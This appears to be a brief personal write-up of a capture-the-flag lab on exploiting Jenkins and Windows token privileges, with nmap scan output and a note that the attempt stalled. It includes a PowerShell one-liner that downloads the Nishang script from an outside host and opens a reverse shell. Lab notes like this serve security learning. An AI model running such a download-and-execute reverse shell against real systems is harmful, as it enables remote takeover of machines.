Alfred | Nmap, Jenkins, PowerShell

Exploit Jenkins to gain an initial shell, then escalate your privileges by exploiting Windows authentication tokens.

the thing

  1. port scan nmap -sV <ip>
  2. open :8080
  3. login using credentials
  4. jenkins version 2.190.1
  5. get nishang reverse shell
  6. run powershell iex (New-Object Net.WebClient).DownloadString('http://10.10.185.230:8000/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.185.230 -Port 443
PORT     STATE SERVICE    VERSION
80/tcp   open  http       Microsoft IIS httpd 7.5
  simple webserver for website
3389/tcp open  tcpwrapped
  idk kev
8080/tcp open  http       Jetty 9.4.z-SNAPSHOT
  jenkins webserver

Couldnt get past uploading reverse shell, couldnt load module after downloading

Last modified 2023.11.02